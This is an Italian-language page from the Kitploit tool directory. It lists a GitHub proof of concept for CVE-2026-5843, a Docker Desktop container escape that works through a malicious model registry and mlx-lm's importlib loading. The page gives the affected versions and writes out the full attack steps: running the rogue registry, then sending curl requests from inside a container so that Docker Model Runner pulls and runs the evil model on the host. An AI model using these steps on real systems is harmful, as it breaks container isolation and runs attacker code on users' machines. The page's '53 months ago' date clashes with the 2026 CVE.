Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-5843 — POC di evasione da container Docker tramite mlx-metal importlib | Kitploit
Strumenti/GitHubGitHub/davidrxchester/cve-2026-5843
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitRed TeamingSviluppo PayloadEscape dal ContainerSicurezza dell'IA
GitHubdavidrxchester/cve-2026-5843

CVE-2026-5843

POC di evasione da container Docker tramite mlx-metal importlib

Vedi Repository
53 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-5843 PoC

Registry OCI minimale che serve un modello dannoso per sfruttare il percorso di esecuzione importlib di model_file in mlx-lm. Quando Docker Model Runner carica il modello per l'inferenza, model.py viene eseguito sull'host come utente connesso.

Richiede: Docker Desktop ≤ 4.70.x (Apple Silicon) con Model Runner abilitato

Utilizzo

root@kitploit:~
# 1. Start the registry on the host
python3 poc_cve_2026_5843.py

# 2. From any container on the Docker network
docker run -it --rm curlimages/curl sh

curl -X POST http://model-runner.docker.internal/api/pull \
  -H 'Content-Type: application/json' \
  -d '{"name":"localhost:5555/evil/model:latest"}'

curl --max-time 120 -X POST http://model-runner.docker.internal/engines/mlx/v1/chat/completions \
  -H 'Content-Type: application/json' \
  -d '{"model":"localhost:5555/evil/model:latest","messages":[{"role":"user","content":"hi"}]}'

L'output viene scritto in ~/Desktop/mlx.txt sull'host.

Analisi completa: https://davidrochester.com/posts/container-escape-via-inference

CVE correlate

  • CVE-2026-5817 — vllm-metal trust_remote_code=True, stessa superficie di attacco, corretto in Docker Desktop 4.68.0
Scarica lo strumento